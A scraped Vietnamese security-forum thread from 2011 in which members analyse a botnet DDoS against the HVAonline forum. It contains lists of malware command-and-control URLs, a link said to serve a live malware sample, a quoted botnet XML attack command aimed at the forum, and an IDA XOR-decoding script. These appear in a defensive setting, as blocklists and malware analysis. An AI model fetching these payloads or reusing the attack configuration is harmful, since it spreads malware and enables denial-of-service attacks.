Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ? 
Em quên mất rồi :(]]>
/hvaonline/posts/list/39641.html#244512 /hvaonline/posts/list/39641.html#244512 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Danh sách các host và các file virus, DDOS commands của tụi stl mà chúng ta đã biết được tính tới thời điểm này: Code:
1.  http://safebrowser.dyndns.org/photos/safebrowser1.gif
2.  http://safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
3.  http://express.blogdns.info/advertise.gif
4.  http://fastupdate.dyndns-office.com/advertise.gif
5.  http://hot.enfaqs.com/advertise.gif
6.  http://securelogin.doomdns.com/advertise.gif
7.  http://tongfeirou.dyndns-web.com/banner1.png
8.  http://biouzhen.dyndns-server.com/banner1.png
9.  http://maowoli.dyndns-free.com/banner1.png
10. http://poxxf.com/flash.swf
11. http://paxds.com/flash.swf
12. http://poxxf.com/images.gif
13. http://speed.cyline.org:443/flower.bmp
14. http://speed.cyline.org:443/BlueSphere.bmp
15. http://speed.cyline.org:443/plxzyin0fx.bmp
16. http://second.dinest.net/xc.jpg
17. http://second.dinest.net/xv.jpg
Mong bà con phổ biến, bật firewall để lọc các URL trên và các trình capture để check. 
Chỉ cần thêm mớ này vô host file (trong C:\windows\system32\drivers\etc\) là xong: Code:
127.0.0.1 safebrowser.dyndns.org
127.0.0.1 safebrowsing.dyndns-blog.com
127.0.0.1 express.blogdns.info
127.0.0.1 fastupdate.dyndns-office.com
127.0.0.1 hot.enfaqs.com
127.0.0.1 securelogin.doomdns.com
127.0.0.1 tongfeirou.dyndns-web.com
127.0.0.1 biouzhen.dyndns-server.com
127.0.0.1 maowoli.dyndns-free.com
127.0.0.1 poxxf.com
127.0.0.1 paxds.com
127.0.0.1 poxxf.com
127.0.0.1 speed.cyline.org
127.0.0.1 second.dinest.net
]]>
/hvaonline/posts/list/39641.html#244513 /hvaonline/posts/list/39641.html#244513 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. uxtheme.manifest thì xoá ngay tắp lự giúp em nhé Cảm ơn rang0 nhé !]]> /hvaonline/posts/list/39641.html#244517 /hvaonline/posts/list/39641.html#244517 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Đúng là tụi này thâm và nham hiểm thật. Chỉ một chút sơ hở, chủ quan của anh em ta mà tụi nó đã move và build toàn bộ các bot mới qua host khác. Bây giờ tấn công HVA không còn một mình AcrobatUpdater.exe nữa. Bà con cứ gặp uxtheme.manifest thì xoá ngay tắp lự giúp em nhé Cảm ơn rang0 nhé ! 
He he, cái botnet mới này đấm không nhanh và nhiều như cái cũ mà đấm chậm, chắc và âm ỉ, kiểu như bên ngoài không thấy bị trầy xước nhưng bên trong lục phủ ngũ tạng bị bấy nhầy vậy :-) . Đúng là anh em ta chủ quan quá. Cứ nhắm vô cái botnet đã lộ để phòng thủ nên bị chết là phải.]]>
/hvaonline/posts/list/39641.html#244518 /hvaonline/posts/list/39641.html#244518 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. He he, cái botnet mới này đấm không nhanh và nhiều như cái cũ mà đấm chậm, chắc và âm ỉ, kiểu như bên ngoài không thấy bị trầy xước nhưng bên trong lục phủ ngũ tạng bị bấy nhầy vậy . Đúng là anh em ta chủ quan quá. Cứ nhắm vô cái botnet đã lộ để phòng thủ nên bị chết là phải.  Anh mô tả mà em đọc như chiêu "Đại lực kim cương chỉ" của thiếu lâm :))]]> /hvaonline/posts/list/39641.html#244520 /hvaonline/posts/list/39641.html#244520 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Bọn stl này đúng là điên cuồng, cuồng thật rồi. http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.  
Đi nghe pác Q bom nói. Không biết ngoài Unikey, Vietkey, Winrar có chứa virus không mấy anh nhỉ? Mấy ngày nay không vào HVA được buồn quá! ]]>
/hvaonline/posts/list/39641.html#244522 /hvaonline/posts/list/39641.html#244522 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://tongfeirou.dyndns-web.com


]]>
/hvaonline/posts/list/39641.html#244527 /hvaonline/posts/list/39641.html#244527 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.



]]>
/hvaonline/posts/list/39641.html#244529 /hvaonline/posts/list/39641.html#244529 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Bọn stl này đúng là điên cuồng, cuồng thật rồi. http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.  
Ramnit là virus lây file, không phải các virus được đề cập trong chủ đề này đâu.]]>
/hvaonline/posts/list/39641.html#244532 /hvaonline/posts/list/39641.html#244532 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Công nhận các bạn STL "sneaky" thiệt :-) . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm. Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn). 
Hi anh Conmale,Anh có thể giải thích rõ chỗ màu đỏ đc không,chúng sử dụng kỹ thuật gì vậy anh?]]>
/hvaonline/posts/list/39641.html#244535 /hvaonline/posts/list/39641.html#244535 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Công nhận các bạn STL "sneaky" thiệt :-) . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm. Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn). 
Tụi STL làm đầy log tomcat hả a :D]]>
/hvaonline/posts/list/39641.html#244541 /hvaonline/posts/list/39641.html#244541 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244547 /hvaonline/posts/list/39641.html#244547 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

yuhari wrote:
trận sáng nay là gì nhỉ -:|-  
Trận sáng nay có tên là "thổ phỉ mạo danh chân tu" :-) Các bạn STL đấm kinh thế?
(hình chụp lúc 3 giờ 22 phút sáng ngày 4 tháng 8 năm 2011). Đấm cỡ này, các bạn vô diễn đàn thấy nhanh hay chậm? Cỡ HVA, một diễn đàn phi lợi nhuận, tự duy trì bằng tiền túi mà các bạn đấm không chết nổi thì vứt quách cái botnet đi vì nó chẳng đập nổi ai ngoài mấy cái site nhảm. Malware thì đạo code, đạo ý tưởng, chắp vá. "hắc kinh" thì chọn kế sách bẩn thỉu nhất (ăn cắp pass) chớ chẳng bao giờ chơi nổi trò tấn công trực diện, thiên hạ thì bị "bạch hoá" bằng cách thêu dệt bậy bạ còn bản thân mình thì chui nhủi như đám sinh vật sợ ánh sáng. Từ kỹ thuật đế tư cách đều thuộc dạng tin tặc hạng bét. Ngay cả bọn blackhat chôm chĩa credit card hay cho thuê bot để tấn công thiên hạ còn có một chút nguyên tắc và mục đích thấp hèn là để kiếm tiền. Các bạn thì chỉ loay hoay với một mớ niềm tin và tự ái vặt để làm những việc bại hoại, đáng phỉ nhổ. Các bạn trẻ tuổi nông nổi thì không nói gì, các bạn đã có tuổi và đã kinh qua mà vẫn hỗ trợ những trò bại hoại, thấp hèn như thế này thì không biết các bạn đang cố bảo vệ cái gì nữa, chắc là các bạn đang bảo vệ cái gì "đẹp đẽ" lắm.]]>
/hvaonline/posts/list/39641.html#244549 /hvaonline/posts/list/39641.html#244549 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244550 /hvaonline/posts/list/39641.html#244550 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Ặc ặc, đọc tới đây mà không biết stl là gì à ? stl = sinh tử lệnh = sống chết theo lệnh !? stl # STL: C++ Standard Template Library nhé. Chớ nhầm lẫn là tụi coder C++ khắp thế giới nhảy vào phang đấy. 
xin lỗi spam tý nhé! Theo mình lũ này phải gọi là: Sờ Ti Lợn (STL) mới đúng! =)) ]]>
/hvaonline/posts/list/39641.html#244554 /hvaonline/posts/list/39641.html#244554 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

PXMMRF wrote:

rang0 wrote:
Cùng chào đón 1 server mới của STL nào : Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org) 
Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended 
Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection) 
Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó : Code:
http://www.mediafire.com/?bdk5fvj8bf8k6nr
 
Domain map.ripper.info là tên miền con (subdomain) của domain ripper.info. Tên miền ripper.info bị suspended (treo). Có một số lý do khiến tên miền bị treo, trong đó lý do chính, phổ biến là người dùng (registrant) không, chưa trả tiền đúng thời hạn cho công ty quản lý domain (registrar). Domain chính ripper.info bị treo thì các subdomain của nó dĩ nhiên cũng bị treo trong sử dụng. Công ty quản lý domain này (ripper.info) là SEDO, (Anh quốc). Domain và website mang tên domain gắn chặt với nhau, nhưng không phải là một. Vì vậy khi domain bị treo, website vẫn có thể vẫn active, nhưng nói chung chỉ được vài ngày. Lý do là việc create host hay thay đổi create host mất công và tốn thời gian (khoảng tối thiểu 2 ngày), nên registrar cân nhắc trong việc này: Họ cảnh báo tình trạng suspended để người dùng mau chóng trả tiền, như thế họ không cần phải create host lại. Đồng thời họ cũng đợi có khách hàng mới mua lại domain này thì create host lai luôn thể. Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngày sau đó, STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info. Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO Trang chủ của website của công ty SEDO: http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e Đây là trang của SEDO thông báo bán ripper.info: http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e Note: 1- Từ ngày 2-8 tôi đã hoàn tất việc thiết lập một sever (loai nhỏ nhưng có 2 CPU) riêng, chuyên dùng để kiểm tra các virus-trojạn của STL, xác định chính xác các kết nối trên mạng của các virus-trojan này. Server được cài nhiều chương trình theo rõi mạng, antivirus, firewall tiên tiến. Tôi đang thử file Unikey của bạn lequi trước đây đã cung cấp. Sẽ thông báo kết quả cụ thể sau. 2- Tôi đã có đủ thông tin về webserver-website "speed.cyline.org" của STL. Cũng sẽ thông báo hầu các bạn ]]>
/hvaonline/posts/list/39641.html#244557 /hvaonline/posts/list/39641.html#244557 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info. Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO Trang chủ của website của công ty SEDO: http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e Đây là trang của SEDO thông báo bán ripper.info: http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e  
Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ. Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước Code:
Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]
Và malware vẫn đang được cập nhật đều :(.]]>
/hvaonline/posts/list/39641.html#244558 /hvaonline/posts/list/39641.html#244558 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

PXMMRF wrote:
Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info. Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO Trang chủ của website của công ty SEDO: http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e Đây là trang của SEDO thông báo bán ripper.info: http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e  
Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ. Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước Code:
Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]
Và malware vẫn đang được cập nhật đều :(. 
Ừ khác nhau, nhiều là khác. Như là PHAM XUAN MAI với ĐẶNG THÁI MAI. Người sau là một danh nhân nước Việt, bố vợ của Đại tướng huyền thoại VÕ NGUYÊN GIÁP. Còn kẻ trước chỉ là một người dân bình thường, không tên tuổi, tuy được học hành bài bản đến nơi đến chốn (bằng cấp thật 100%), nhưng khả năng có hạn. HÌ hì. Đùa một chút. Thôi trở lại vấn đề. Xem lai bài của rang0 (trang 9 topic này) thì domain đúng là map.priper.info thật. Nhưng vào đia chỉ này http://map.priper.info:8080 (webserver mở cổng 8080-chắc cài Apache) thì cũng lại thấy domain này cũng bị suspended. Thôi để tôi kiểm tra kỹ hơn. Nếu http://map.priper.info cũng đang bị suspended thật, thì những nôi dung tôi viết ở post trên liên quan đến vấn đề "suspended" vẫn hoàn toàn có thể áp dụng được với map.priper.info(trừ đoan sau nói về ripper.info domain) Nôi dung liênquan đến suspended domain là: "Có một số lý do khiến tên miền bị treo, trong đó lý do chính, phổ biến là người dùng (registrant) không, chưa trả tiền đúng thời hạn cho công ty quản lý domain (registrar) ................... Domain và website mang tên domain gắn chặt với nhau, nhưng không phải là một. Vì vậy khi domain bị treo, website có thể vẫn active, nhưng nói chung chỉ được vài ngày. Lý do là việc create host hay thay đổi create host mất công và tốn thời gian (khoảng tối thiểu 2 ngày), nên registrar cân nhắc trong việc này: Họ cảnh báo tình trạng suspended để người dùng mau chóng trả tiền, như thế họ không cần phải create host lại. Đồng thời họ cũng đợi có khách hàng mới mua lại domain này thì create host lai luôn thể." ]]>
/hvaonline/posts/list/39641.html#244561 /hvaonline/posts/list/39641.html#244561 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244562 /hvaonline/posts/list/39641.html#244562 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch wrote:
Theo dõi file anh Conmale thông báo (ddos_28-07-2011) thì có IP của cơ quan em(nhiều subnet) nên mình không biết cách xác định máy nào nhiễm malware của STL vì ko phải net admin chỉ là người dùng. bạn nào có cách hay soft gì thì hướng dẫn mình với. ps: báo cáo anh Conmale là file ddos-03-08-2011-uniq thì không có, nếu anh có cách gì thì mail cho em với nhé, em muốn góp chút gì đó để HVA giảm được tấn công ddos. E-mail và IP của em thì chắc anh thừa biết rồi. :d  
Cách dễ nhất là search từng máy để tìm "AcrobatUpdater.exe". Cách ngăn chặn nhanh nhất ngay lúc này là chặn các domains và subdomains sau: dyndns.org dyndns-blog.com blogdns.info dyndns-office.com enfaqs.com doomdns.com dyndns-web.com dyndns-server.com dyndns-free.com poxxf.com paxds.com cyline.org dinest.net]]>
/hvaonline/posts/list/39641.html#244567 /hvaonline/posts/list/39641.html#244567 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. map.ripper.info" thay vì phải là "map.priper.info" mới đúng. Nay đã thấy. Hì hì

TQN on 03/08/2011 14:36:37 wrote:
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ? 

rang0 wrote:

TQN wrote:
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ? 
Em quên mất rồi :( 
]]>
/hvaonline/posts/list/39641.html#244568 /hvaonline/posts/list/39641.html#244568 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244573 /hvaonline/posts/list/39641.html#244573 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat
]]>
/hvaonline/posts/list/39641.html#244580 /hvaonline/posts/list/39641.html#244580 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:
Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat
 
kiểu mô tả này khá giống với googleCrashHandle trước đây, duy chỉ có điều không dùng steganography. file cấu hình hồi đó rất thô sơ, không xml]]>
/hvaonline/posts/list/39641.html#244589 /hvaonline/posts/list/39641.html#244589 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:
Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat
 
Tin tức trên viet.rfi.fr http://www.viet.rfi.fr/chau-a/20110804-tin-tac-trung-quoc-tan-cong-tu-my-den-viet-nam]]>
/hvaonline/posts/list/39641.html#244592 /hvaonline/posts/list/39641.html#244592 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. THÔNG BÁO KẾT QUẢ KIỂM TRA THỰC TẾ CÁC MẪU VIRUS-TROJAN CỦA STL Như viết ở post trên, tôi đã thiết lập một server (loại nhỏ) riêng, chuyên dùng để kiểm tra các virus-trojan của STL. Server cài hai OS: WinXPSP3 và Win2K3SP2. Cách thức kiểm tra như sau: - Cài các mẫu virus mà bạn lequi, axasin, TQN và các bạn khác cung cấp vào server. - Disable on-access scan hay guard của các trình antivirus để virus không bị delete hay bị vô hiệu hoá khi khởi chạy. - Theo rõi Activities của virus thông qua firewall và sau đó áp dụng chế độ "Allow" hay "Trust this process", để không ngăn trở quá trình virus thâm nhập vào hệ thống - Kiểm tra việc virus thiết lập các file mới, tạo lập các directory mới trong hệ thống, xoá các registry cũ và tạo lập các registry mới hay thay đổi value của registry.... - Kiểm tra kỹ quá trình kết nối trên mạngdo virus tạo lập, các thông số của quá trình kết nối (port , TCP/UDP protocol, RX-TX....) , địa chỉ IP và host name-domain của destination (mục tiêu kết nối)... - Phân tích các gói tin (packet) của quá trình kết nối này - Check thẳng vào các master webserver-website để có thêm thông tin.... Kết quả thì nhiều và cần được sắp xếp lại một cách hệ thống. Vì vậy tôi chỉ thông báo tóm tắt các kết quả sau. 1- File Unikey mà bạn lequi cung cấp (bạn cũng cho đó là malicios Unikey- nó có nhiệm vụ download từ mạng các malicious file MsHelpcenter.exe và MSHelpCenter.idx... về máy zombies) thưc ra không phải là một virus-trojan. Khi cho nhiễm vào máy, ngoài những file liên quan, không thấy xuất hiện các file lạ-nghi ngờ, các registry lạ và không tạo ra bất cứ kết nốimang nào (theo rõi trong 2 ngày). Tôi nhớ dường như bạn range0 cũng đã có ý kiến ờ 1 post trong topic nay, xác định đây không phải là virus-trojan. Vậy thì thưc tế Unikey nào khác trên mạnghay một file khác mới là virus trojan của STL khi nhiễm vào máy sẽ khởi phát quá trình download các file MSHelpCenter.* hay các malicious khác về máy? 2- File AdobeUpdater.exe (do TQN cung cấp ngày 28-7-2011) đúng là một virus-trojan của STL. Khi cho nhiễm vào máy, virus này tạo lập một số file mới và directory trong hệ thống. Đồng thời AdobeUpdater.exe xoá môt số registry của hệ thống và thiết lập các registry mới, cần cho việc khởi chạy sau khi hệ thống được restart. Xem hình ảnh đính kèm. Ngay sau khi được kích hoạt AdobeUpdater.exe đã tạo một kết nối Internet đến đia chỉ IP: 193.106.175.68:80, đây chính là IP tĩnh của webserver second.dinest.net của STL, mà tôi đã kiểm tra và phân tích kỹ ở post trên. Điều này hoàn toàn phù hợp với kết luận của TQN và bạn acoustics89, công bố ở các post trên, trong topic này. Có hai điểm cần lưu ý thêm: - Khi đươc kích hoạt (click chuột vào AdobeUpdater.exe) thì lập tức AdobeUpdater.exe tạo ra một kết nôi đến second.dinest.net, như nói ở trên. Nhưng sau đó kết nối ngừng và không có file (data file hay image file) nào được download về máy. Có lẽ lúc này second.dinest.net tạm thời không cỏn đươc giao nhiêm vụ làm một master webserver-website nữa? Sau một lần kết nôi như vậy, trong liên tục 1 ngày sau đó, AdobeUpdater.exe không tự đông khởi tao một lần kết nối mạng nào khác nũa. - Thưc ra AdobeUpdater.exe đã bị Avira antivirus phát hiện ra ngay khi nó đươc copy từ một USB vào testing server của tôi hoặc khi giải nén nó trên server. Vì vậy nếu một user nào cài Avira antivirus (free edition) và up to date, thì AdobeUpdater.exe không thể nhiễm vào máy hay kích hoạt trong máy. McAfee Antivirus version 8.8 thì không phát hiện ra AdobeUpdater.exe, kể cả khi scan trực tiếp vào file Xin xem hình ảnh


Avira antivirus (guard enabled) phát hiện ra AdobeUpdater.exe ngay khi nó đang được copy vào máy
Be noted: Bác conmale ơi. Tôi đã resize các file ảnh upload để đạt chiều ngang nhỏ hơn 500pixels, như yêu cầu. Nhưng như vậy chữ trên hình quá nhỏ, rất khó đọc. Theo kinh nghiệm thưc tế của tôi, có thể upload file hình ảnh có chiều ngang lên tới 750, thậm chí 800 pixels vẫn không có vấn đề gì, khung hình forum không hề bị phá vỡ. vÌ vậy nên hạn chế max là 800 pixels, thay vì 500 pixels. Mong bác xem lại. Cam ơn ]]>
/hvaonline/posts/list/39641.html#244593 /hvaonline/posts/list/39641.html#244593 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244595 /hvaonline/posts/list/39641.html#244595 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp wrote:
@anh Conmale: Có cách nào dùng gậy ông đập lưng ông không, chứ chả lẽ chịu trận mãi thế này khó chịu thật. Ngoài phân tích và update cho các AV thì cũng phải đập lại cho tơi bời chứ!? 
Đâu cần làm vậy bạn, nếu muốn làm vậy thì các anh ý đã làm lâu rồi. Anh em member chia sẻ thông cảm cho sự vất vả của các anh admin và các anh RCE qua đó học hỏi các anh ý. Chứ còn mình ko hèn như STL phải không bạn. :d]]>
/hvaonline/posts/list/39641.html#244597 /hvaonline/posts/list/39641.html#244597 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244598 /hvaonline/posts/list/39641.html#244598 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
Bây giờ chưa có mẫu mới hả anh, vẫn cái kia nó dos, lại còn post dòng này, bực quá. Code:
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/hvaonline/posts/list/210/39641.html#244332" keepCookies="1" crawling="1" referer="Hey Postmodernism, When you config HVA like X-Cafe?"/>
mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account ) lúc thì acourxxx :| 
Mấy cái này thằng này không hiểu sao mà suốt ngày Postmodernism =)). Chúng nó nên chuyển từ "Postder" sang "Commu". lol. Chắc mình phải lập 2pic báo mình là Postdernism. cái truyện cách đây 1 năm mà suốt ngày lôi ra :-< tiểu nhân ...]]>
/hvaonline/posts/list/39641.html#244599 /hvaonline/posts/list/39641.html#244599 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp wrote:
@anh Conmale: Có cách nào dùng gậy ông đập lưng ông không, chứ chả lẽ chịu trận mãi thế này khó chịu thật. Ngoài phân tích và update cho các AV thì cũng phải đập lại cho tơi bời chứ!? 
Hì hì, đập lại thì không khó nhưng làm như vậy thì có khác gì bọn họ đâu em? Ở một góc độ nào đó, anh cũng cám ơn họ đã tạo điều kiện để táy máy thêm và tìm cách kiện toàn + tối ưu hệ thống. Trong quá trình làm, anh cũng học thêm được nhiều điều bổ ích và lý thú. Đặc biệt cảm ơn các anh em kỹ thuật trực tiếp tham gia và các anh em không trực tiếp tham gia kỹ thuật đã động viên, hỗ trợ mọi mặt. Bọn họ đang chơi một trò chơi tồi tệ và tự đẩy mình càng lúc càng xa và đó chính là chiêu "tự đập" vậy :-) .]]>
/hvaonline/posts/list/39641.html#244600 /hvaonline/posts/list/39641.html#244600 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244601 /hvaonline/posts/list/39641.html#244601 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244602 /hvaonline/posts/list/39641.html#244602 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. TeamViewer_Desktop.exe 2. themeui.manifest Bà con nào thấy có 2 file này trên máy thì chắc chắn máy bà con vẫn còn uxtheme.manifestTeamViewer.exe giả mạo. Xin vui lòng kill & del tất cả 4 file trên giùm ! Em nghĩ là mấy anh nên cho cái host speed.cyline.org giải nghệ, về hưu cho rồi. Còn tiếc gì nó nữa ha ! ]]> /hvaonline/posts/list/39641.html#244603 /hvaonline/posts/list/39641.html#244603 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch wrote:
Giờ này có lẽ HVA vẫn đang bị ddos anh Conmale nhỉ, em mới check lại cái second.dinest.net thì thấy đã trỏ sang 1 IP khác là 46.166.147.48 ở Ru.  
truy cập thử vào http://second.dinest.net/ nó hiện lên trang có 3 chữ lạnh lùng vãi: WTF =)) =)) =)) ]]>
/hvaonline/posts/list/39641.html#244604 /hvaonline/posts/list/39641.html#244604 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244606 /hvaonline/posts/list/39641.html#244606 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
static UIXorBlock()
{
    auto len = 0;
    auto value = 0;
    auto step = 0;

    auto eaStart = SelStart();
    if (BADADDR == eaStart)
    {
        eaStart = ScreenEA();
    }
    else
    {
        len = SelEnd() - eaStart;
    }

    eaStart = AskAddr(eaStart, "Enter the start address to xor");
    if (BADADDR == eaStart)
    {
        Message("Invalid address !\n");
        return;
    }

    len = AskLong(len, "Enter the count of bytes to xor");
    if (-1 == len)
    {
        Message("Invalid len of block !\n");
        return;
    }

    value = AskLong(0, "Enter the value to xor");
    if (-1 == value)
    {
        Message("Invalid xor value !\n");
        return;
    }

    step = AskLong(1, "Number of bytes for every step ?");
    if (step < 1)
    {
        Message("Invalid step !\n");
        return;
    }

    auto ea = eaStart;
    while (ea < eaStart + len)
    {
        if (1 == step)
        {
            PatchByte(ea, Byte(ea) ^ value);
        }
        else if (2 == step)
        {
            PatchWord(ea, Word(ea) ^ value);
        }
        else
        {
            PatchDword(ea, Dword(ea) ^ value);
        }

        ea = ea + step;
    }
}
Lần sau đừng có chơi mã hoá = Xor nữa nhé ! 2 anh em HVA: yên tâm, chỉ nói một nữa thôi, một nữa là bí mật. Với lại thông cảm, tiếng Anh em "cùi bắp" lắm, nên mấy cái msg trên chắc chắn là sai Vô ca bu la ry (vocabulary) (lúc trước bà cô tiếng Anh của em cứ phạt em hoài vì cái tội đọc tiếng Anh như tiếng Việt này) ;) ]]>
/hvaonline/posts/list/39641.html#244610 /hvaonline/posts/list/39641.html#244610 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
He he, sáng nay grep awk sed mớ logs thì thấy các bạn STL "thử" lung tung ;). Công nhận secure website để kiddies không phá phách bậy bạ thì không khó nhưng secure website để khỏi bị DDoS kiểu "crawler" thì mệt thiệt. Cái "hiệu lệnh" xml của các bạn STL có những limitation (hoặc flaw) không nhỏ nhưng có điều, tớ chả rảnh để viết thêm một ký sự DDoS HVA cho nên các bạn tự mà phân tích những limitation ấy :-) . Ngay cả những con zombies cũng bị những limitation khác. Nếu webserver bị DDoS mà respond một dạng packet có nội dung nhất định nào đó thì có thể làm "teo" con zombie và teo máy chạy zombie (nhưng có lẽ các bạn không quan tâm mấy con zombies bị treo), các bạn chỉ quan tâm đến việc có zombies để phá hoại mà thôi, phải không nào? :-)  
Ý anh là: No Response 204, Not found 404, Service temporarily overloaded 502, ... để đánh lừa bot hay anh làm "crash" nó ? Bật mí được không anh ;) ?]]>
/hvaonline/posts/list/39641.html#244611 /hvaonline/posts/list/39641.html#244611 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244612 /hvaonline/posts/list/39641.html#244612 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
